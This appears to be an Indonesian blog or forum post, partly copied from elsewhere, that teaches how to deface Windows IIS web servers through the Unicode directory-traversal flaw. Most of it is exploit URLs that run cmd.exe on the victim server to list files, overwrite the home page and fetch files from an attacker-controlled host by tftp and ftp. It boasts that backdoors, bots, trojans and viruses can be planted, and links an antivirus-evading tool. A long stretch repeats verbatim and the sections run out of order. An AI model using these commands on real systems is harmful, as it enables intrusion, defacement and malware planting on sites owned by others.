http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+dir+c:
Jika terdapat Bug Maka Pada title brower kita ada kata CGi Error Maka Kita telah menembus web site itu
Maka Yang terlihat pada brower kita adalah list yang berupa isi hardisk webserver tersebut sama halnya
command dir yang kita lakukan di Dos Prompt
Directory of c:
10/05/2001 19:56 Programs Files
10/05/2001 19:56 Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54 AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm
b.)Setelah berhasil liat List Hardisk Kita Harus cari Path_Translade web nya dengan menggunakan command /c+dir+c: di ubah menjadi /c+set
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+dir+c: menjadi http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+set /c+dir+c: di ubah menjadi /c+set
maka Akan keluar CGI error yang isinya menyatakan Configurasi Batch Sytem WebServer tersebut. Keluar Macam - Macam, Yang Perlu dilihat cuma:
Path_Translated=d:\inetpub\wwwroot
c.) Langkah Selanjutnya Adalah Copy file cmd.exe dengan nama baru cmd1.exe atau nama anda contoh Jangkrik.exe dengan mengganti
/c+dir+c: menjadi /c+copy+c:
lalu ditambahkan dengan : winntsystem32cmd.exe+c:jangkrik.exe
sehingga kita dapatkan :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+copy+c%3Awinntsystem32cmd.exe+c%3Ajangkrik.exe
sekarang kamu bisa liat file cmd1.exe udah ada di direktori :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c:
Tujuan Ini Sebenarnya untuk menyingkat command pada addres ie kita
d.) Cari halaman index ke http://www.target.com/blah.ida
Kadang-kadang ekstensi .ida yang tidak diketahui akan merespon lokal path.
Kalo trik .ida tidak bekerja, coba gunakan direktori InetPub :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c%3Ainetpub
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c%3Ainetpubwwwroot
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c%3Ainetpubwwwrootindex.htm
sebenarnya langkah ini tidak perlu tapi untuk jaga -jaga kan ngak papa
dengan langkah b.) tadi sebenarnya kita sudah tau dimana letah index.htm nya atau dengan kata lain folder webnya
e.) kalau lo merasa dirinya hacker backup dulu halaman depan web nya, karena hacker kerjanya bukan menghancurkan tapi memperingatkan
hanya orang - orang amatiran atau katalain orang yang berjiwa vandalis yang kerja merusak tanpa backup index.htm nya, jika tidak kita menulisnya dengan nama file baru dengan cara :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+copy+c%3Ainetpubwwwrootindex.htm+c%3Ainetpubwwwrooti ndex.htm.bak
f.) Baru Kita deface atau echo Halaman Depannya dengan command dibawah ini :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+echo+You+Were+Hacked+>+c:inetpubwwwrootindex.htm
untuk tidak merusak web nya kita tulis dengan nama file baru
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+echo+You+Were+Hacked+>+c:inetpubwwwrootjangkrik.htm
/c+echo+You%20Were%20Hacked+>+c: >>> adalah untuk menuliskan kata-kata You Were Hacked pada
c:inetpubwwwrootindex.htm file yang ditulis atau c:inetpubwwwrootjangkrik.htm file yang ditulis
Untuk Anda yang telah Paham Bahasa Html Kalau pengen Hasil Defacenya keren Gunakan command ini
/c+echo"
This Web Site Hacking BY ....:::J.A.N.G.K.|.K:...
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda
"+>+c:inepubwwwrootindex.htm
/c+echo"
This Web Site Hacking BY ....:::J.A.N.G.K.|.K:...
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda
"+>+c:inepubwwwrootjangkrik.htm
keterangan :
%3d adalah pernyataan tanda =
%22 adalah Pernyataan tanda "
%23 adalah pernyataan tanda #
Untuk Anda Yang Paham Html Anda Bisa NGapain aja Tuh Deface Web Anda. Biar Bagus hack deface nya di input pakai Flash juga
g.) Langkah terkahir untuk liat hasilnya Membaca file yang lain dengan menggunakan perintah 'type' :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+type+c%3Ainetpubwwwrootindex.htm
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+type+c%3Ainetpubwwwrootjangkrik.htm
Atau liat Langsung aja http://www.target.com/ atau http://www.target.com/jangkrik.htm
Jika dikau menemukan webserver ini dalam penulisannya accses denied ( penolakan penulisan ) Maka langkah kedua yaitu dengan cara tftp:
B.) Deface WebSite Dengan Cara tftp
Deface nya dilakukan dengan meng-upload file lewat TFTP32
Untuk Mendukung Tftp kita download dulu softwarenya http://www.download.com/ ketik keyword nya TFTP32
Dikau Main Di Kompi diserver (sebab di user pasti takkan bisa).
Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.
mari kita mulai meng-uploadnyah perintahnya sesuai langkah berikut ini :
a.) Kita Lakukan Langkah a.) (A.)pada deface dengan echo untuk mencari vulnernnya atau bug cginya
sehingga kita mendapatkan holenya atau script nya http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/
langkah selanjutnya yaitu uploadnya lagi. Namun Sebelumnya kita Dah siapkan File htm/html halaman web defacenya ( berkreasi lah dikau disini )
Setelah semua siap baru upload dengan command http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe up-load)+ C:InetPubwwwrootmain.html
b.)Kita liat lagi apa yg terjadi di IE kita.
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :
Waa..waaa .selamat dikau telah berhasil meng-upload file dikau memakai sofwer TFTP32 tadee silahkan buka web site target tadi
Kekurangannyah dalam meng-upload file lewat TFTP32 terkadang suatu server (web site) tidak mau menerima up-load file kita tadee. Jikalau itu terjadi maka gunakanlah cara pertama di atas tadee.
C.) Dengan Cara Ftp Dengan Web Kita Yang Telah Kita Isi Dengan Bahan Deface Kita
Langkah Pertama adalah kita bikin dulu domain gratisan di web server gratisan. di web itu kita drop halaman web deface kita atau backdoor,virus atau program penghancur lainnya
selanjutnya kita lakukan Sama dengan Cara langkah a.)(A.) setelah dikau tau hole cgi bugnya atau unicodennya maka dikau lakukan langkah berikut ini:
a.) Setelah kita menemukan vulnernya
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:
Directory of c:
10/05/2001 19:56
Programs Files
10/05/2001 19:56
Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54
AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm
b.) Lalu kita lakukan langkah copy sesuai di langkah b.)(A.) ---->>tujuan nya memendekkan command unicode nya
c.) Lalu Kita Liat +set nya untuk melihat patch translade nya
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+set
Kira Nya path nya di c:inetpubwwwroot
d.)Langkah Selanjutnya Yaitu kita membuat script ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+close+>>+c:inetpubwwwrootjangkrik.ftp
Setelah Scrip jangkrik.ftp selesai di liat lagi script nya apa benar
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+type+c:inetpubwwwrootjangkrik.ftp
Setelah selesai script tuh kita jalan kan lagi script nya:
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+ftp+-s:c:inetpubwwwrootjangkrik.ftp
buka ie satulagi untuk liat file nya dah smapai belum
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:inetpubwwwroot
Kalau dah terkirim selamat dah
Keterangan nya :
Pada scrip jangkrik.ftp itu kita muatkan hal ini sebenarnya
open geocities.com --->>> scriptnya --->> +echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
jangkrik --->> user name --->>> scriptnya -->> +echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
anuamakang --->>> password --->>> scriptnya -->> +echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
lcd c:inetpubwwwroot --->>> folder tujuan --->>> scriptnya -->>>+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
ascii --->>> bentuk file --->>> scripnya --->>> +echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
get jangkrik.htm ---->>> command tranfer file --->>> +echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
close --->> perintah dc ke web server ---->>> scripnya --->>> +echo+close+>>+c:inetpubwwwrootjangkrik.ftp
hehehe Dengan cara ini anda dapat drop apa saja keweb orang tuh baik itu web deface, backdror, ircserver, bot, bnc, psybnc, trojan and virus deh..........
untuk mengirim file yang binary kode bentuk file dari asci di ubah menjadi binary
seng duwur aku copas neng forum sebelah soalnya aku orak pinter nulis dowo karo kie tak kei seko gaweaan ku dewe dudu2 copas
sekedar share tool buat pemalas nie.. yg malas pake cara manual silahkan cobain yg ini,
tool ini sama kegunaanya kek punyanya om riluke (wekkzzz sok kenal wkwkwk)
cmn kalo buatannya om riluke kedetect sebagai trojan di kaspersky kalo ini ga ada sama skali n udah gwa buktiin ndiri
masalah kinerja ga jauh bedah lah.. sama buatannya riluke (itu sih pendapat gwa.. heheh)
Download source Code
http://www.4shared.com/file/183402357/f15ee059/m4x.html
kalo ada kesalahan mohon di perbaiki soalnya saya cuma manusia yang masih punya kekurangan ...
Sumber
2. Login
Ini Merupakan Directory yang Ada Di Web Site Tersebut
Directory Ini Di Configurasi Dengan Script tertentu Supayafile dalam Web tersebut Berhubungan Jika terjadi bug pada script nya maka kita bisa bembus web ini
ada beberapa contoh login diantaranya :
a)/_vti_bin
b)/_vti_cnf
c)/cgi-bin
d)/scripts
e)/msadc
3. Unicode --->> merupakan code yang dapat membaca script configurasi website tersebut code ini yang dapat membaca bug cgi nya
hasil codingnya seperti bisa 1-3 x pengulangan tergantung target yang akan kita hackinng
a) ..%c1%1c..
b) ..%c0%9v..
c) ..%c0%af..
d) ..%c0%qf..
e) ..%c1%8s..
f) ..%e0%80%af..
g) ..%c1%9c..
h) ..%c1%pc..
4. OS target -->>ini Menyatakan Sertificate Web Os kita WinNT dan Win98
0xB5 ISO 8859-1
0xC5 ISO 8859-1
0xEA CP437
0x2140 JIS X 0208
0x22 ISO 8859-1
5. Cara Kerja
Secara Garis Besar deface Ini dilakukan Dengan tiga Cara yaitu :
A.) Deface WebSite Perintah Echo
a.)Secara umum : http://target/login/unicode/os/system/c+dir atau http://www.target.com/login/unicode/os/system/c+dir
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+dir+c:
Jika terdapat Bug Maka Pada title brower kita ada kata CGi Error Maka Kita telah menembus web site itu
Maka Yang terlihat pada brower kita adalah list yang berupa isi hardisk webserver tersebut sama halnya
command dir yang kita lakukan di Dos Prompt
Directory of c:
10/05/2001 19:56 Programs Files
10/05/2001 19:56 Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54 AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm
b.)Setelah berhasil liat List Hardisk Kita Harus cari Path_Translade web nya dengan menggunakan command /c+dir+c: di ubah menjadi /c+set
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+dir+c: menjadi http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+set /c+dir+c: di ubah menjadi /c+set
maka Akan keluar CGI error yang isinya menyatakan Configurasi Batch Sytem WebServer tersebut. Keluar Macam - Macam, Yang Perlu dilihat cuma:
Path_Translated=d:\inetpub\wwwroot
c.) Langkah Selanjutnya Adalah Copy file cmd.exe dengan nama baru cmd1.exe atau nama anda contoh Jangkrik.exe dengan mengganti
/c+dir+c: menjadi /c+copy+c:
lalu ditambahkan dengan : winntsystem32cmd.exe+c:jangkrik.exe
sehingga kita dapatkan :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+copy+c%3Awinntsystem32cmd.exe+c%3Ajangkrik.exe
sekarang kamu bisa liat file cmd1.exe udah ada di direktori :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c:
Tujuan Ini Sebenarnya untuk menyingkat command pada addres ie kita
d.) Cari halaman index ke http://www.target.com/blah.ida
Kadang-kadang ekstensi .ida yang tidak diketahui akan merespon lokal path.
Kalo trik .ida tidak bekerja, coba gunakan direktori InetPub :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c%3Ainetpub
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c%3Ainetpubwwwroot
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c%3Ainetpubwwwrootindex.htm
sebenarnya langkah ini tidak perlu tapi untuk jaga -jaga kan ngak papa
dengan langkah b.) tadi sebenarnya kita sudah tau dimana letah index.htm nya atau dengan kata lain folder webnya
e.) kalau lo merasa dirinya hacker backup dulu halaman depan web nya, karena hacker kerjanya bukan menghancurkan tapi memperingatkan
hanya orang - orang amatiran atau katalain orang yang berjiwa vandalis yang kerja merusak tanpa backup index.htm nya, jika tidak kita menulisnya dengan nama file baru dengan cara :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+copy+c%3Ainetpubwwwrootindex.htm+c%3Ainetpubwwwrooti ndex.htm.bak
f.) Baru Kita deface atau echo Halaman Depannya dengan command dibawah ini :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+echo+You+Were+Hacked+>+c:inetpubwwwrootindex.htm
untuk tidak merusak web nya kita tulis dengan nama file baru
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+echo+You+Were+Hacked+>+c:inetpubwwwrootjangkrik.htm
/c+echo+You%20Were%20Hacked+>+c: >>> adalah untuk menuliskan kata-kata You Were Hacked pada
c:inetpubwwwrootindex.htm file yang ditulis atau c:inetpubwwwrootjangkrik.htm file yang ditulis
Untuk Anda yang telah Paham Bahasa Html Kalau pengen Hasil Defacenya keren Gunakan command ini
/c+echo"
This Web Site Hacking BY ....:::J.A.N.G.K.|.K:...
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda
"+>+c:inepubwwwrootindex.htm
/c+echo"
This Web Site Hacking BY ....:::J.A.N.G.K.|.K:...
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda
"+>+c:inepubwwwrootjangkrik.htm
keterangan :
%3d adalah pernyataan tanda =
%22 adalah Pernyataan tanda "
%23 adalah pernyataan tanda #
Untuk Anda Yang Paham Html Anda Bisa NGapain aja Tuh Deface Web Anda. Biar Bagus hack deface nya di input pakai Flash juga
g.) Langkah terkahir untuk liat hasilnya Membaca file yang lain dengan menggunakan perintah 'type' :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+type+c%3Ainetpubwwwrootindex.htm
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+type+c%3Ainetpubwwwrootjangkrik.htm
Atau liat Langsung aja http://www.target.com/ atau http://www.target.com/jangkrik.htm
Jika dikau menemukan webserver ini dalam penulisannya accses denied ( penolakan penulisan ) Maka langkah kedua yaitu dengan cara tftp:
B.) Deface WebSite Dengan Cara tftp
Deface nya dilakukan dengan meng-upload file lewat TFTP32
Untuk Mendukung Tftp kita download dulu softwarenya http://www.download.com/ ketik keyword nya TFTP32
Dikau Main Di Kompi diserver (sebab di user pasti takkan bisa).
Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.
mari kita mulai meng-uploadnyah perintahnya sesuai langkah berikut ini :
a.) Kita Lakukan Langkah a.) (A.)pada deface dengan echo untuk mencari vulnernnya atau bug cginya
sehingga kita mendapatkan holenya atau script nya http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/
langkah selanjutnya yaitu uploadnya lagi. Namun Sebelumnya kita Dah siapkan File htm/html halaman web defacenya ( berkreasi lah dikau disini )
Setelah semua siap baru upload dengan command http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe up-load)+ C:InetPubwwwrootmain.html
b.)Kita liat lagi apa yg terjadi di IE kita.
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :
Waa..waaa .selamat dikau telah berhasil meng-upload file dikau memakai sofwer TFTP32 tadee silahkan buka web site target tadi
Kekurangannyah dalam meng-upload file lewat TFTP32 terkadang suatu server (web site) tidak mau menerima up-load file kita tadee. Jikalau itu terjadi maka gunakanlah cara pertama di atas tadee.
C.) Dengan Cara Ftp Dengan Web Kita Yang Telah Kita Isi Dengan Bahan Deface Kita
Langkah Pertama adalah kita bikin dulu domain gratisan di web server gratisan. di web itu kita drop halaman web deface kita atau backdoor,virus atau program penghancur lainnya
selanjutnya kita lakukan Sama dengan Cara langkah a.)(A.) setelah dikau tau hole cgi bugnya atau unicodennya maka dikau lakukan langkah berikut ini:
a.) Setelah kita menemukan vulnernya
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:
Directory of c:
10/05/2001 19:56
Programs Files
10/05/2001 19:56
Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54
AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm
b.) Lalu kita lakukan langkah copy sesuai di langkah b.)(A.) ---->>tujuan nya memendekkan command unicode nya
c.) Lalu Kita Liat +set nya untuk melihat patch translade nya
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+set
Kira Nya path nya di c:inetpubwwwroot
d.)Langkah Selanjutnya Yaitu kita membuat script ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+close+>>+c:inetpubwwwrootjangkrik.ftp
Setelah Scrip jangkrik.ftp selesai di liat lagi script nya apa benar
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+type+c:inetpubwwwrootjangkrik.ftp
Setelah selesai script tuh kita jalan kan lagi script nya:
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+ftp+-s:c:inetpubwwwrootjangkrik.ftp
buka ie satulagi untuk liat file nya dah smapai belum
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:inetpubwwwroot
Kalau dah terkirim selamat dah
Keterangan nya :
Pada scrip jangkrik.ftp itu kita muatkan hal ini sebenarnya
open geocities.com --->>> scriptnya --->> +echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
jangkrik --->> user name --->>> scriptnya -->> +echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
anuamakang --->>> password --->>> scriptnya -->> +echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
lcd c:inetpubwwwroot --->>> folder tujuan --->>> scriptnya -->>>+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
ascii --->>> bentuk file --->>> scripnya --->>> +echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
get jangkrik.htm ---->>> command tranfer file --->>> +echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
close --->> perintah dc ke web server ---->>> scripnya --->>> +echo+close+>>+c:inetpubwwwrootjangkrik.ftp
hehehe Dengan cara ini anda dapat drop apa saja keweb orang tuh baik itu web deface, backdror, ircserver, bot, bnc, psybnc, trojan and virus deh..........
untuk mengirim file yang binary kode bentuk file dari asci di ubah menjadi binary
seng duwur aku copas neng forum sebelah soalnya aku orak pinter nulis dowo karo kie tak kei seko gaweaan ku dewe dudu2 copas
sekedar share tool buat pemalas nie.. yg malas pake cara manual silahkan cobain yg ini,
tool ini sama kegunaanya kek punyanya om riluke (wekkzzz sok kenal wkwkwk)
cmn kalo buatannya om riluke kedetect sebagai trojan di kaspersky kalo ini ga ada sama skali n udah gwa buktiin ndiri
masalah kinerja ga jauh bedah lah.. sama buatannya riluke (itu sih pendapat gwa.. heheh)
Download source Code
http://www.4shared.com/file/183402357/f15ee059/m4x.html
kalo ada kesalahan mohon di perbaiki soalnya saya cuma manusia yang masih punya kekurangan ...
Sumber
Langganan:
Postingan (Atom)